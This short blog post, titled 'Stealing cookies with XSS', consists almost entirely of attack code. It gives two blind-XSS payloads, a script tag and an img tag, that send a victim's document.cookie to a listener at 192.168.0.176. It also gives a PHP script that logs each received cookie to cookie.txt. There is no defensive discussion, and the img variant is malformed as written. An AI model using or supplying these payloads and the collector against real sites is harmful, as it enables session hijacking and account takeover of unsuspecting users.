Stealing cookies with XSS

Blind XSS cookie payload

<script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script>

<img src='http://192.168.0.176/Hcookie.php?cookie='+document.cookie>

Server

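<?php
// Read the value of the "cookie" query parameter sent by the payload
$cookie = $_GET['cookie'];
// Append it as one line to cookie.txt
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>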
posted @ 2023-02-26 21:55  幻-心